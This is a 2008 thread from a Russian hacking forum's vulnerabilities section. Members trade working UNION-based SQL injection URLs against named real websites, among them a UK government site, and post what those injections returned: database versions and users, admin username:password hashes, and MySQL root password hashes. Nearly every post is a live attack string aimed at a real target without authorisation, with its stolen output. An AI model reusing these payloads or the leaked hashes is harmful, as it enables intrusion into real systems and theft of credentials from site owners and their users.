ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5201  
Старый 27.03.2008, 19:57
CraZee
Новичок
Регистрация: 27.03.2007
Сообщений: 10
Провел на форуме:
125548

Репутация: 13
По умолчанию

Вот что мне удалось раздобыть. Все таже жопла:

Код:
http://www.salsa-tonic.ru/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
admin:137cf78adb0e92c930853be00babcd95
--------------
 
Ответить с цитированием

  #5202  
Старый 27.03.2008, 20:47
sk0ch0k
Новичок
Регистрация: 25.02.2008
Сообщений: 1
Провел на форуме:
103685

Репутация: 3
По умолчанию

http://vsms.ru/show.php?show=news&id=-10+union+select+user()/*
http://www.mbstver.ru/res_1/streets/show.php?id=-10+union+select+user(),2,3,4/*
 
Ответить с цитированием

  #5203  
Старый 27.03.2008, 22:04
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132

Репутация: 63
По умолчанию

http://studsovet.ulsu.ru/index.php?pid=8&fac=-1+UNION+SELECT+1,2,3,4,5+FROM+null.user/*
Тока нимагу дальше расшарить((
 
Ответить с цитированием

  #5204  
Старый 27.03.2008, 22:20
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

2 Buffalon

Access denied for user 'studsovet'@'localhost' to database 'mysql'
Код:
http://studsovet.ulsu.ru/index.php?pid=8&fac=-1+UNION+SELECT+1,2,3,4,5+from+mysql.user/*
Нет прав на просмотр юзеров
 
Ответить с цитированием

  #5205  
Старый 27.03.2008, 23:56
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.dvd.inmsk.ru/full_descript.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,aes_decrypt(aes_encrypt(conca t(user(),char(50),version(),char(50),database()),1 ),1),57/*

compinmsk@localhost24.1.15-Debian_1-log2compinmsk
 
Ответить с цитированием

  #5206  
Старый 28.03.2008, 00:16
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Код:
http://www.proenergy.ru/news.html?news_id=-43/**/union/**/select/**/1,2,3,4,5,6,7,concat(version(),0x3a,database(),0x3a,user())/*
Цитата:
4.0.27-max-logroenerg_pcmsroenerg_pcms@v18.valuehost.ru
Вывод ошибки очень информативен
------------------------------------------------------------
Код:
http://www.lipki.ru/?action=read&t_id=4&c_id=-97/**/union/**/select/**/1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7/*&lang=ru
Цитата:
4.0.27-max-log:lipki97:lipki97@v18.valuehost.ru
----------------------------------------------------------
Код:
http://www.ritambhara.com/photos.php?galid=330+union+select+1,2,3,version(),5,6,7/*
Код:
http://www.ritambhara.com/basket.php?unitid=5097%20union%20select%201,2,3,4,5,6,7/*
Код:
http://www.ritambhara.com/unit.php?typeid=-220+union+select+1,2,3,4/*
Цитата:
4.0.27-max-log
ritambha_shop@v18.valuehost.ru
ritambha_shop

Форум phpbb но до таблицы наверное нет доступа
---------------------------------------------------------
Код:
http://www.teapot.ru/articles.php?id=99999/**/union/**/select/**/1,2,version()/*
Цитата:
4.0.27-max-log
autoepc3@v18.valuehost.ru
autoepc3

Последний раз редактировалось samarin; 28.03.2008 в 01:07..
 
Ответить с цитированием

  #5207  
Старый 28.03.2008, 00:31
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

http://doctor-al.ru/
Код:
http://doctor-al.ru/get_news.php?news_id=-1+UNION+SELECT+1,2,3,VERSION(),5,6,7/*
БД 5, есть какой-то магазин, ПР высокий. Ковырять влом.
http://superski.ru/
Код:
http://superski.ru/adm/show.php?news_id=-1+UNION+SELECT+1,2,VERSION(),4,5,6,7/*
ПР 4. БД 5.
http://www.peer.org/
Код:
http://www.peer.org/news/news_id.php?row_id=-1+UNION+SELECT+VERSION(),2,3,4/*
БД 4. Какой-то буржуйский ресурс.

2bobob +1 xD
 
Ответить с цитированием

  #5208  
Старый 28.03.2008, 17:00
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

www.jensen-lewis.com
Код:
http://www.jensen-lewis.com/product.php?col_id=999999999999+UNION+SELECT+1,2,3,4,5/*
5.0.38-Ubuntu_0ubuntu1.2-log
jensenlewis
jl@localhost


www.intecma.de
Код:
http://www.intecma.de/scripts/main.php?view_id=9999999+UNION+SELECT+1,2,3,4,5,6/*
5.0.32-Debian_7etch5-log
intecma00
intecma00@localhost

www.anped.org
Код:
http://www.anped.org/index.php?part=999999999'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*
5.0.32-Debian_7etch5-log

www.korce.eu
Код:
http://www.korce.eu/panel.php?kategoria=99999999999999+UNION+SELECT+@@version/*
4.1.22-log

www.wmcoe.gov.uk
Код:
http://www.wmcoe.gov.uk/index.php?page=999999999999'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
5.0.22-community-max-nt

www.ruralhome.org
Код:
http://www.ruralhome.org/infoNews.php?id=99999999'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*
4.1.20-log
 
Ответить с цитированием

  #5209  
Старый 28.03.2008, 18:33
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию

Исследовательский центр История фамилии
http://www.familii.ru/index.php?pCode=vote&voteID=73674+union+select+con cat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAM E),2+from+INFORMATION_SCHEMA.COLUMNS/*
http://www.familii.ru/index.php?pCode=vote&voteID=73674+union+select+con cat(login,char(58),passwd),2+from+users/*
ADMIN:7ab6684faaf74beeccb73263c7030935
serg:c4ca4238a0b923820dcc509a6f75849b = 1;

ИА "День
http://www.dayudm.ru/phorum.php?msid=23185+union+select+1,2,3,4,5,conca t(user,char(58),password),7,8,9,10+from+mysql.user/*

root:*9C02C8F396EAD8B7ACC0B9B4F4CD20135483E3D3
m17617:*1E29CBD36E9AE8BDFC9957759470DDBDF065EA92

Роллеры питера
http://rollerpiter.ru/?p=5+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(u ser(),char(58),database(),char(58),version()),13,1 4/*
 
Ответить с цитированием

  #5210  
Старый 29.03.2008, 00:35
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

http://www.search.uz/
Код:
http://www.search.uz/review.php?sid=0x2d33313731303427%20union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
4.1.22-standard:searchu_se@localhost:searchu_se
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 13 (пользователей: 0 , гостей: 13)
 


Быстрый переход




ANTICHAT.XYZ